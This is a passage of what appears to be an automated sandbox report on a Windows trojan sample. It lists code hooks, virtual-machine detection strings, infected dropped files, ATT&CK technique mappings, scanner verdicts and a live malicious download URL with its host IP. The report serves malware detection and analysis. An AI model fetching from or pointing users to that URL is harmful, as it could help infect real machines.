    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeMemory written: PID: 2196 base: 77382FE0 value: E9 2A D0 7C 8B Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeMemory written: PID: 2196 base: 2B60005 value: E9 BB 2D 82 74 Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeMemory written: PID: 2196 base: 77382DC0 value: E9 4A D2 7D 8B Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeMemory written: PID: 2196 base: 2B70005 value: E9 CB 2A 81 74 Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeMemory written: PID: 2196 base: 77382AD0 value: E9 3A D5 7E 8B Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeMemory written: PID: 2196 base: 2B80005 value: E9 7B 2B 80 74 Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeMemory written: PID: 2196 base: 77382B80 value: E9 8A D4 7F 8B Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeMemory written: PID: 2196 base: 2B90005 value: E9 1B 2F 7F 74 Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeMemory written: PID: 2196 base: 77382F20 value: E9 EA D0 80 8B Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeMemory written: PID: 2196 base: 2BB0005 value: E9 FB 2C 7D 74 Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeMemory written: PID: 2196 base: 77382D00 value: E9 0A D3 82 8B Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeMemory written: PID: 2196 base: 2BC0005 value: E9 2B 2F 7C 74 Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeMemory written: PID: 2196 base: 77382F30 value: E9 DA D0 83 8B Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeMemory written: PID: 2196 base: 2BD0005 value: E9 9B 2F 7B 74 Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeMemory written: PID: 2196 base: 77382FA0 value: E9 6A D0 84 8B Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeMemory written: PID: 2196 base: 2BE0005 value: E9 0B 2D 7A 74 Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeMemory written: PID: 2196 base: 77382D10 value: E9 FA D2 85 8B Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeMemory written: PID: 2196 base: 2BF0005 value: E9 2B 2D 79 74 Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeMemory written: PID: 2196 base: 77382D30 value: E9 DA D2 86 8B Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeMemory written: PID: 2196 base: 2C00005 value: E9 BB 2C 78 74 Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeMemory written: PID: 2196 base: 77382CC0 value: E9 4A D3 87 8B Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeMemory written: PID: 2196 base: 2C10005 value: E9 8B 2F 77 74 Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeMemory written: PID: 2196 base: 77382F90 value: E9 7A D0 88 8B Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeMemory written: PID: 2196 base: 2C20005 value: E9 5B 2B 76 74 Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeMemory written: PID: 2196 base: 77382B60 value: E9 AA D4 89 8B Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeMemory written: PID: 2196 base: 2C30005 value: E9 6B 2B 75 74 Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeMemory written: PID: 2196 base: 77382B70 value: E9 9A D4 8A 8B Jump to behavior
    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 799
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Source: SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe, 00000000.00000002.2178560126.0000000000783000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: Y9/CSBIEDLL.DLL
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeDropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_2-1068
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeCode function: 2_2_00641718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00641754h2_2_00641718
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeCode function: 2_2_006429E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,2_2_006429E2
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeCode function: 2_2_00642B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,2_2_00642B8C
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior
    Source: Amcache.hve.2.drBinary or memory string: VMware
    Source: Amcache.hve.2.drBinary or memory string: VMware Virtual USB Mouse
    Source: Amcache.hve.2.drBinary or memory string: vmci.syshbin
    Source: Amcache.hve.2.drBinary or memory string: VMware, Inc.
    Source: Amcache.hve.2.drBinary or memory string: VMware20,1hbin@
    Source: Amcache.hve.2.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
    Source: Amcache.hve.2.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.2.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
    Source: Amcache.hve.2.drBinary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
    Source: mXfByV.exe, 00000002.00000002.2214008040.000000000133E000.00000004.00000020.00020000.00000000.sdmp, mXfByV.exe, 00000002.00000003.2152475783.0000000001357000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: Amcache.hve.2.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: mXfByV.exe, 00000002.00000002.2214008040.000000000133E000.00000004.00000020.00020000.00000000.sdmp, mXfByV.exe, 00000002.00000003.2152475783.0000000001357000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWfQ
    Source: Amcache.hve.2.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
    Source: Amcache.hve.2.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
    Source: Amcache.hve.2.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.2.drBinary or memory string: vmci.sys
    Source: Amcache.hve.2.drBinary or memory string: vmci.syshbin`
    Source: Amcache.hve.2.drBinary or memory string: \driver\vmci,\driver\pci
    Source: Amcache.hve.2.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.2.drBinary or memory string: VMware20,1
    Source: Amcache.hve.2.drBinary or memory string: Microsoft Hyper-V Generation Counter
    Source: Amcache.hve.2.drBinary or memory string: NECVMWar VMware SATA CD00
    Source: Amcache.hve.2.drBinary or memory string: VMware Virtual disk SCSI Disk Device
    Source: Amcache.hve.2.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
    Source: Amcache.hve.2.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
    Source: Amcache.hve.2.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
    Source: Amcache.hve.2.drBinary or memory string: VMware PCI VMCI Bus Device
    Source: Amcache.hve.2.drBinary or memory string: VMware VMCI Bus Device
    Source: Amcache.hve.2.drBinary or memory string: VMware Virtual RAM
    Source: Amcache.hve.2.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
    Source: Amcache.hve.2.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeAPI call chain: ExitProcess graph end nodegraph_2-1042
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeProcess information queried: ProcessInformationJump to behavior
    Source: SciTE.exe.2.drBinary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeCode function: 2_2_00641718 GetSystemTimeAsFileTime,SHSetValueA,SHGetValueA,__aulldiv,__aulldiv,2_2_00641718
    Source: C:\Users\user\AppData\Local\Temp\mXfByV.exeCode function: 2_2_0064139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId,2_2_0064139F
    Source: Amcache.hve.2.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
    Source: Amcache.hve.2.drBinary or memory string: msmpeng.exe
    Source: Amcache.hve.2.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
    Source: Amcache.hve.2.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
    Source: Amcache.hve.2.drBinary or memory string: MsMpEng.exe

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: Process Memory Space: mXfByV.exe PID: 5008, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: Process Memory Space: mXfByV.exe PID: 5008, type: MEMORYSTR
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Native API
    1
    DLL Side-Loading
    1
    Access Token Manipulation
    1
    Masquerading
    1
    Credential API Hooking
    11
    System Time Discovery
    1
    Taint Shared Content
    1
    Credential API Hooking
    1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts2
    Process Injection
    1
    Access Token Manipulation
    11
    Input Capture
    211
    Security Software Discovery
    Remote Desktop Protocol11
    Input Capture
    11
    Non-Standard Port
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
    DLL Side-Loading
    2
    Process Injection
    Security Account Manager2
    Process Discovery
    SMB/Windows Admin Shares1
    Archive Collected Data
    2
    Ingress Tool Transfer
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
    Obfuscated Files or Information
    NTDS3
    File and Directory Discovery
    Distributed Component Object ModelInput Capture2
    Non-Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
    Software Packing
    LSA Secrets3
    System Information Discovery
    SSHKeylogging12
    Application Layer Protocol
    Scheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    DLL Side-Loading
    Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe55%ReversingLabsWin32.Trojan.Strictor
    SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe50%VirustotalBrowse
    SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe100%AviraTR/Black.Gen2
    SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe100%Joe Sandbox ML
    SourceDetectionScannerLabelLink
    C:\Program Files\7-Zip\Uninstall.exe100%AviraW32/Jadtre.B
    C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe100%AviraW32/Jadtre.B
    C:\Users\user\AppData\Local\Temp\mXfByV.exe100%AviraTR/Dldr.Small.Z.haljq
    C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%AviraW32/Jadtre.B
    C:\Program Files\7-Zip\Uninstall.exe100%Joe Sandbox ML
    C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe100%Joe Sandbox ML
    C:\Users\user\AppData\Local\Temp\mXfByV.exe100%Joe Sandbox ML
    C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%Joe Sandbox ML
    C:\Users\user\AppData\Local\Temp\mXfByV.exe100%ReversingLabsWin32.Trojan.Skeeyah
    C:\Users\user\AppData\Local\Temp\mXfByV.exe96%VirustotalBrowse
    No Antivirus matches
    SourceDetectionScannerLabelLink
    ddos.dnsnb8.net11%VirustotalBrowse
    SourceDetectionScannerLabelLink
    http://www.scintilla.org/scite.rng0%URL Reputationsafe
    http://www.rftp.comJosiah0%URL Reputationsafe
    http://www.activestate.com0%URL Reputationsafe
    http://www.activestate.comHolger0%URL Reputationsafe
    http://upx.sf.net0%URL Reputationsafe
    http://www.rftp.com0%URL Reputationsafe
    http://www.rftp.com0%URL Reputationsafe
    http://www.baanboard.comBrendon0%URL Reputationsafe
    https://www.smartsharesystems.com/0%URL Reputationsafe
    http://www.scintilla.org0%URL Reputationsafe
    http://www.scintilla.org0%URL Reputationsafe
    http://www.spaceblue.comMathias0%URL Reputationsafe
    http://www.spaceblue.comMathias0%URL Reputationsafe
    https://www.smartsharesystems.com/Morten0%URL Reputationsafe
    http://www.develop.com0%URL Reputationsafe
    http://www.lua.org0%URL Reputationsafe
    http://ddos.dnsnb8.net/100%URL Reputationmalware
    http://ddos.dnsnb8.net:799/cj//k1.rar100%URL Reputationmalware
    http://www.spaceblue.com0%URL Reputationsafe
    http://www.baanboard.com0%URL Reputationsafe
    http://www.develop.comDeepak0%URL Reputationsafe
    http://pki-crl.symauth.com/ca_219679623e6b4fa507d638cbeba72ecb/LatestCRL.crl070%Avira URL Cloudsafe
    http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsusersIncIEEERootCA.cr0%Avira URL Cloudsafe
    http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE0%Avira URL Cloudsafe
    http://ddos.dnsnb8.net:799/cj//k1.rarn2100%Avira URL Cloudphishing
    http://ddos.dnsnb8.net:799/cj//k1.rarD100%Avira URL Cloudmalware
    http://pki-ocsp.symauth.com00%Avira URL Cloudsafe
    http://ddos.dnsnb8.net:799/cj//k1.rar2p100%Avira URL Cloudmalware
    http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsusersIncIEEERootCA.cr0%VirustotalBrowse
    http://ddos.dnsnb8.net:799/cj//k1.rarcC:100%Avira URL Cloudphishing
    http://ddos.dnsnb8.net:799/cj//k1.rarD9%VirustotalBrowse
    http://ddos.dnsnb8.net:799/cj//k1.rar2p12%VirustotalBrowse
    http://ddos.dnsnb8.net:799/cj//k1.rarcC:9%VirustotalBrowse
    http://pki-crl.symauth.com/ca_219679623e6b4fa507d638cbeba72ecb/LatestCRL.crl070%VirustotalBrowse
    NameIPActiveMaliciousAntivirus DetectionReputation
    ddos.dnsnb8.net
    44.221.84.105
    truetrueunknown
    NameMaliciousAntivirus DetectionReputation
    http://ddos.dnsnb8.net:799/cj//k1.rartrue
    • URL Reputation: malware
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://www.scintilla.org/scite.rngSciTE.exe.2.drfalse
    • URL Reputation: safe
    unknown
    http://www.rftp.comJosiahSciTE.exe.2.drfalse
    • URL Reputation: safe
    unknown
    http://www.activestate.comSciTE.exe.2.drfalse
    • URL Reputation: safe
    unknown
    http://www.activestate.comHolgerSciTE.exe.2.drfalse
    • URL Reputation: safe
    unknown
    http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DEmXfByV.exe, 00000002.00000003.2139694761.0000000001250000.00000004.00001000.00020000.00000000.sdmp, mXfByV.exe, 00000002.00000002.2213495608.0000000000643000.00000002.00000001.01000000.00000005.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://upx.sf.netAmcache.hve.2.drfalse
    • URL Reputation: safe
    unknown
    http://www.rftp.comSciTE.exe.2.drfalse
    • URL Reputation: safe
    • URL Reputation: safe
    unknown
    http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsusersIncIEEERootCA.crSecuriteInfo.com.Win32.Malware-gen.17468.9520.exefalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    http://pki-crl.symauth.com/ca_219679623e6b4fa507d638cbeba72ecb/LatestCRL.crl07SecuriteInfo.com.Win32.Malware-gen.17468.9520.exefalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    http://www.baanboard.comBrendonSciTE.exe.2.drfalse
    • URL Reputation: safe
    unknown
    https://www.smartsharesystems.com/SciTE.exe.2.drfalse
    • URL Reputation: safe
    unknown
    http://ddos.dnsnb8.net:799/cj//k1.rarDmXfByV.exe, 00000002.00000003.2152475783.00000000013B5000.00000004.00000020.00020000.00000000.sdmptrue
    • 9%, Virustotal, Browse
    • Avira URL Cloud: malware
    unknown
    http://www.scintilla.orgSciTE.exe.2.drfalse
    • URL Reputation: safe
    • URL Reputation: safe
    unknown
    http://www.spaceblue.comMathiasSciTE.exe.2.drfalse
    • URL Reputation: safe
    • URL Reputation: safe
    unknown
    https://www.smartsharesystems.com/MortenSciTE.exe.2.drfalse
    • URL Reputation: safe
    unknown
    http://ddos.dnsnb8.net:799/cj//k1.rarn2mXfByV.exe, 00000002.00000002.2214008040.000000000133E000.00000004.00000020.00020000.00000000.sdmptrue
    • Avira URL Cloud: phishing
    unknown
    http://www.develop.comSciTE.exe.2.drfalse
    • URL Reputation: safe
    unknown
    http://pki-ocsp.symauth.com0SecuriteInfo.com.Win32.Malware-gen.17468.9520.exefalse
    • Avira URL Cloud: safe
    unknown
    http://www.lua.orgSciTE.exe.2.drfalse
    • URL Reputation: safe
    unknown
    http://ddos.dnsnb8.net/mXfByV.exe, 00000002.00000003.2152475783.0000000001357000.00000004.00000020.00020000.00000000.sdmptrue
    • URL Reputation: malware
    unknown
    http://ddos.dnsnb8.net:799/cj//k1.rar2pmXfByV.exe, 00000002.00000002.2214279858.0000000002DEA000.00000004.00000010.00020000.00000000.sdmptrue
    • 12%, Virustotal, Browse
    • Avira URL Cloud: malware
    unknown
    http://www.spaceblue.comSciTE.exe.2.drfalse
    • URL Reputation: safe
    unknown
    http://www.baanboard.comSciTE.exe.2.drfalse
    • URL Reputation: safe
    unknown
    http://www.develop.comDeepakSciTE.exe.2.drfalse
    • URL Reputation: safe
    unknown
    http://ddos.dnsnb8.net:799/cj//k1.rarcC:mXfByV.exe, 00000002.00000003.2152475783.0000000001357000.00000004.00000020.00020000.00000000.sdmptrue
    • 9%, Virustotal, Browse
    • Avira URL Cloud: phishing
    unknown
    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs
    IPDomainCountryFlagASNASN NameMalicious
    44.221.84.105
    ddos.dnsnb8.netUnited States
    14618AMAZON-AESUStrue
    Joe Sandbox version:40.0.0 Tourmaline
    Analysis ID:1509229
    Start date and time:2024-09-11 10:31:06 +02:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:0h 5m 11s
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
    Number of analysed new started processes analysed:11
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
